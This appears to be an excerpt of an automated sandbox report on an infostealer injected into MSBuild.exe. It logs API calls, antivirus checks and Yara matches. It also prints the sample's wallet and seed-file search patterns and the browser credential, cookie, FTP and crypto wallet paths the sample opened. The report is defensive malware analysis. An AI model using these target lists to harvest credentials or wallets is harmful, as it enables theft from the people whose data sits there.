Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, 4_2_00429D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l, 4_2_0042E56F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 4_2_00427576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 4_2_00428DC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 4_2_0042B5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 4_2_0042B580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 4_2_0042B623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoA, 4_2_0042E6A4
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 13_2_00B0A0B0
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: GetLocaleInfoW, 13_2_00B0A1B6
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 13_2_00B0A285
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 13_2_00B09921
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: EnumSystemLocalesW, 13_2_00B01A42
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: EnumSystemLocalesW, 13_2_00B09BC3
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: EnumSystemLocalesW, 13_2_00B09CA9
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: EnumSystemLocalesW, 13_2_00B09C0E
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 13_2_00B09D34
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: GetLocaleInfoW, 13_2_00B01EEC
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: GetLocaleInfoW, 13_2_00B09F87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006176BF GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_006176BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00410C53 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 4_2_00410C53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 4_2_00410D2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.7.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: MsMpEng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0.2.file.exe.638ad8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.638ad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3636, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR
Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: .*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|DESKTOP|%DESKTOP%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: .*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|DESKTOP|%DESKTOP%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: keystore
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: Yara match File source: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0.2.file.exe.638ad8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.638ad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3636, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6CA70C40 sqlite3_bind_zeroblob, 4_2_6CA70C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6CA70D60 sqlite3_bind_parameter_name, 4_2_6CA70D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C998EA0 sqlite3_clear_bindings, 4_2_6C998EA0